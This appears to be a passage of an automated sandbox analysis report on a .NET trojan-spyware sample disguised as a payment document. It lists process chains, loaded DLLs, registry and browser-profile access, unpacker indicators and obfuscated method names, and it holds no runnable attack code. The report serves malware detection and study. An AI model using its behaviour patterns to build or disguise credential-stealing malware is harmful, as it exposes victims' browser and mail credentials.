                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, a1PjpmmEEKL740qFJE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@2/2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA - Final Payment.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\secinit.exeFile created: C:\Users\user\AppData\Local\Temp\472E1186Jump to behavior
                Source: SOA - Final Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SOA - Final Payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2603324583.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1940016861.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1940016861.0000000002DFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOA - Final Payment.exeVirustotal: Detection: 62%
                Source: SOA - Final Payment.exeReversingLabs: Detection: 59%
                Source: unknownProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SOA - Final Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SOA - Final Payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA - Final Payment.exe, SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655110436.000000000050F000.00000002.00000001.01000000.0000000C.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2602458312.000000000050F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SOA - Final Payment.exe.450a528.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.cs.Net Code: IfcMEmfppD System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SOA - Final Payment.exe.44ea508.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0184E958 pushfd ; retf 0_2_0184E959
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_059CD7A0 push eax; mov dword ptr [esp], ecx0_2_059CD7B4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_059CDEA1 push eax; ret 0_2_059CDEB3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792BA10 push cs; ret 0_2_0792BA11
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07B319D5 push FFFFFF8Bh; iretd 0_2_07B319D7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0B7845E0 push eax; ret 0_2_0B7845E1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041F003 pushfd ; iretd 5_2_0041F01B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00414086 push esi; ret 5_2_00414095
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00417939 push FFFFFFD7h; retf 5_2_0041793E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040DA26 push es; iretd 5_2_0040DA2E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00418AD8 pushad ; iretd 5_2_00418ADF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041940F push edx; ret 5_2_00419411
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00419416 push edi; retf 5_2_00419417
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_004075C0 push esi; retf 5_2_004075C8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040AD9E push ebp; retf 5_2_0040AD9F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040D5AD push 43AEBFE9h; ret 5_2_0040D5B9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00418654 push ds; ret 5_2_00418656
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00403660 push eax; ret 5_2_00403662
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00401669 push eax; retf 5_2_0040166A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0040760B push ebx; iretd 5_2_0040760D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0041D612 pushfd ; ret 5_2_0041D620
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00414EC6 push esp; ret 5_2_00414EC7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_00401FEE pushad ; retf 5_2_00401FEF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012709AD push ecx; mov dword ptr [esp], ecx5_2_012709B6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033909AD push ecx; mov dword ptr [esp], ecx10_2_033909B6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A642D6 push FFFFFFD7h; retf 10_2_02A642DB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A60A23 push esi; ret 10_2_02A60A32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A64FF1 push ds; ret 10_2_02A64FF3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A713C2 push cs; ret 10_2_02A713D9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61779 push esi; retf 10_2_02A61771
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61749 push esi; retf 10_2_02A61771
                Source: SOA - Final Payment.exeStatic PE information: section name: .text entropy: 7.772646253601764
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, OoBZYlURZFhiWNTeye.csHigh entropy of concatenated method names: 'x6e7mhLKmw', 'PM97DigSad', 'Nxr71M3haK', 'Evx7C1DD22', 'wFq7KpOxnR', 'dNe7ReN3Xv', 'NVv7866jXg', 'iSm7xh4tKW', 'nuw7rw6Hno', 'FGX7anFP5e'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, DWwqrCAdAoD5b25WSq.csHigh entropy of concatenated method names: 'zxuVrOPF8N', 'bSlVkaI6ir', 'svVVAFi6JG', 'hZ2Vu6sTRl', 'XmNVC7kf0i', 'Xm2VgEuWv1', 'uESVK1OYMo', 'hK9VRmjSFb', 'miPVPKgkW6', 'WXTV8Adc3w'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, BbEFNFWk7srD2eL76Q.csHigh entropy of concatenated method names: 'MQroO47rNX', 'jRDo5grL7t', 'QCtoEPBXAy', 'JOvoeWO6nw', 'HTNoYTyrJk', 'o79oyP7Rgr', 'lNCoiQa3kf', 'QaKomAXg5u', 'TjDoDQuRCp', 'AUyolHCRAN'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, WFgxcqC0OBC8Z8lXTy.csHigh entropy of concatenated method names: 'mtjJxkV2JsVI3LsSrdH', 'NPyLFgV6EpLTaQYwdVQ', 'k6BfSn66TZ', 'm1tf0LutA1', 'cFUfXWECCS', 'M0Ey0gV09Qyv7pSuT05', 'oj4KFdVvcuGmNeKBsYR', 'kiyATjVRdDGH1raHUbE'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, a1PjpmmEEKL740qFJE.csHigh entropy of concatenated method names: 'Ib1LAasruw', 'PmrLudgx79', 'wWSLv2NeCh', 'KAbLq6wX26', 'HteLcSon3V', 'yRhLb91n6Q', 'Y7QLF8gx76', 'LmFLsXidh2', 'fe1L4Lpsfa', 'MYpLdAIrWO'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, xMlKa8byoI2WwgvKIZ.csHigh entropy of concatenated method names: 'apnhs6bDP3', 'XaChd9gdNt', 'QkqSN5IJAe', 'KaiSJxAL9p', 'MaLhaAS6VJ', 'yTnhkIsIKR', 'LPUhUg4PR7', 'bUnhAtk60c', 'h54huntJ5S', 'IbJhvKcYii'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, BvYnnC3dq2MFvh150l.csHigh entropy of concatenated method names: 'LytEN4UUj', 'h6heT3E0V', 'qPmy2QyxS', 'XE0i3ZYmm', 'QVxDendjw', 'VLZl4V9DB', 'koDF70UYWiHWW83W9t', 'uGNlxtFcwxxIWZqJXj', 'g61SQ0bTe', 'zokXY6o7Q'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, pp6G2MFxDKv6awNaAk.csHigh entropy of concatenated method names: 'x8T0VWChMs', 'Qvv0hn4Q39', 'i38005TxC9', 'Kiu0ZoqpFN', 'wUL0p0BesR', 'LVi0Q2tlPq', 'Dispose', 'VnoSjBCK5X', 'MOYSLgXVcr', 'XxfSHLJkNi'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, M6Ss5AdqI6xKbLxa2x.csHigh entropy of concatenated method names: 'fvSXH69TfW', 'puvXG6uOfd', 'KZXXf9xxpU', 'N5XXoWX309', 'FS4X0LBGPd', 'WY1XnBYcDt', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, loZW9m4sDEXrM3LKXc.csHigh entropy of concatenated method names: 'cvT01v3sxk', 'GOA0CfFCTR', 'OjL0gAINqh', 'KZl0KHI9lk', 'Lxg0RDudLU', 'FLa0PZcrBG', 'd4u0887LjY', 'u5Y0x3AyE7', 'RDV0W9da3R', 'Fs00rGc5pE'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, aVWu2kJJV36e23MxBVE.csHigh entropy of concatenated method names: 'rsJXd3ZLB6', 'FZFXz6rGgW', 'T4mZN4Vtib', 'hRPZJfc73h', 'dGnZ38SFta', 'ds1ZwN9SM4', 'TM8ZMPg90I', 'j94Z9Jell2', 'IO7ZjEjt7N', 'wk4ZLZopw3'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, E6NKGT1PTud6hIE9NY.csHigh entropy of concatenated method names: 'P5Df9AU2xN', 'zPYfLooyTp', 'NJhfGpKu0S', 'w2kfoxd2Bd', 'I0QfnC865T', 'NwEGc9lB8y', 'PEBGb18wNq', 'ilrGFophly', 'FOpGswM9Gw', 'hInG4hoWZK'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, Goalmj8Bru8UbGGuvJ.csHigh entropy of concatenated method names: 'Qrkoj1CyFY', 'UFwoHTEIYv', 'PZaofVecvq', 'QDefdrXCIc', 'AecfzMwjBI', 'BhfoNcH6aV', 'qoRoJjHAk9', 'yeko3BTw5Q', 'zL9owHl4xT', 'BPZoMsKL8X'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.csHigh entropy of concatenated method names: 'C4Vw9xrq1x', 'IjCwj4PWcA', 'IeYwLsoTp3', 'dEOwH6N6ut', 'MlMwGj1GSn', 'rZvwfHKUs7', 'xXpwoTjKDu', 'yeUwn6W0mo', 's4mwTccue3', 'I4Mw2jY9kO'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, KqSZ65u4YNlGTuZpXE.csHigh entropy of concatenated method names: 'oIVVF1LyAS', 'Os4VsL3eSP', 'EmOV4dOJOp', 'cfCVdR0PBG', 'GyDuKfZGIbI3vKnGfwr', 'g7UlLird3ckw5WjcK2t', 'TZ1hSYrztLg3KGHuOJy', 'vPSIysZBnLmjWpZAXQn'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, Po5X6rJMaqECJJE2YZW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Cw3I0AI9uu', 'x1YIXMh28V', 'z4nIZFtvDa', 'wAmIIrHE9g', 'uPuIpsT2Zi', 'PCtItnJIU4', 'Ix6IQyI8LQ'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, gSW0m3JNlEFcUN1DL5o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kMKXargggR', 'Ka6XktddXd', 'I7KXUeL63X', 'sylXAXJUmM', 'm5NXud2FPh', 'cKrXvCkoZU', 'gDcXqH5o9H'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, nu9h5JqGSZptvqwEWO.csHigh entropy of concatenated method names: 'x81h2qNOb2', 'HurhBO6H3v', 'ToString', 'IX4hjWmQR2', 'B3HhL9ou3A', 'nRVhH4Mj9W', 'x7XhGDT3yk', 'Qbxhfk56O4', 'FVPhoeMLNp', 'gQ4hnURE1h'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, BO7eTHMwJqAxXSAxc7.csHigh entropy of concatenated method names: 'NSNJo1Pjpm', 'zEKJnL740q', 'TnYJ2Eau6C', 'vtkJBZTDwy', 'hhkJVdpm6N', 'IGTJ6PTud6', 'Y24qhlxyWTQQ9jFIIZ', 'kwiknE9vIax5r9Oy0G', 'UEAJJSO5jU', 'O3FJwRMNsM'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, H8dv04LKuelEGyv7Vi.csHigh entropy of concatenated method names: 'Dispose', 'Iv6J4awNaA', 'vbG3CnvAFo', 'JxkPyRXobv', 'PTXJdQJimZ', 't3CJzCy2yB', 'ProcessDialogKey', 'R2T3NoZW9m', 'WDE3JXrM3L', 'IXc33x6Ss5'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, E4ksvqDnYEau6CptkZ.csHigh entropy of concatenated method names: 'YI8HeWrK8h', 'HwPHy8slhM', 'EcQHm9CteF', 'vtFHDqaWmV', 'X63HV0Yxbo', 'NmYH6KuOlx', 'mieHhBT0cr', 'KPWHSJuWIW', 'CWiH0G8W1q', 'YeFHX9Yrks'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, lDwyF6lHJsf1bGhkdp.csHigh entropy of concatenated method names: 'WynGYby0qQ', 'ef7GieByjp', 'OxiHgFdZQE', 'nfMHKJ3gh0', 'Po9HRM6MBf', 'vCqHPfa8md', 'ubGH8C9MQ4', 'FbAHxk3SjX', 'AI4HWWX6Zf', 'hS0HrSproE'
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, u4ol8KzGkXpGUyqCGE.csHigh entropy of concatenated method names: 'OxIXyYNYdq', 'Ka3XmCAlUR', 'I6SXDseYkg', 'YOQX1cyJ8E', 'B0tXCCSuFn', 'ggxXKASMD3', 'TSeXRL4h89', 'XJnXQUcqvd', 'OC4XOjaMVo', 'rhsX5wQqsN'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, OoBZYlURZFhiWNTeye.csHigh entropy of concatenated method names: 'x6e7mhLKmw', 'PM97DigSad', 'Nxr71M3haK', 'Evx7C1DD22', 'wFq7KpOxnR', 'dNe7ReN3Xv', 'NVv7866jXg', 'iSm7xh4tKW', 'nuw7rw6Hno', 'FGX7anFP5e'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, DWwqrCAdAoD5b25WSq.csHigh entropy of concatenated method names: 'zxuVrOPF8N', 'bSlVkaI6ir', 'svVVAFi6JG', 'hZ2Vu6sTRl', 'XmNVC7kf0i', 'Xm2VgEuWv1', 'uESVK1OYMo', 'hK9VRmjSFb', 'miPVPKgkW6', 'WXTV8Adc3w'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, BbEFNFWk7srD2eL76Q.csHigh entropy of concatenated method names: 'MQroO47rNX', 'jRDo5grL7t', 'QCtoEPBXAy', 'JOvoeWO6nw', 'HTNoYTyrJk', 'o79oyP7Rgr', 'lNCoiQa3kf', 'QaKomAXg5u', 'TjDoDQuRCp', 'AUyolHCRAN'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, WFgxcqC0OBC8Z8lXTy.csHigh entropy of concatenated method names: 'mtjJxkV2JsVI3LsSrdH', 'NPyLFgV6EpLTaQYwdVQ', 'k6BfSn66TZ', 'm1tf0LutA1', 'cFUfXWECCS', 'M0Ey0gV09Qyv7pSuT05', 'oj4KFdVvcuGmNeKBsYR', 'kiyATjVRdDGH1raHUbE'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, a1PjpmmEEKL740qFJE.csHigh entropy of concatenated method names: 'Ib1LAasruw', 'PmrLudgx79', 'wWSLv2NeCh', 'KAbLq6wX26', 'HteLcSon3V', 'yRhLb91n6Q', 'Y7QLF8gx76', 'LmFLsXidh2', 'fe1L4Lpsfa', 'MYpLdAIrWO'
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, xMlKa8byoI2WwgvKIZ.csHigh entropy of concatenated method names: 'apnhs6bDP3', 'XaChd9gdNt', 'QkqSN5IJAe', 'KaiSJxAL9p', 'MaLhaAS6VJ', 'yTnhkIsIKR', 'LPUhUg4PR7', 'bUnhAtk60c', 'h54huntJ5S', 'IbJhvKcYii'
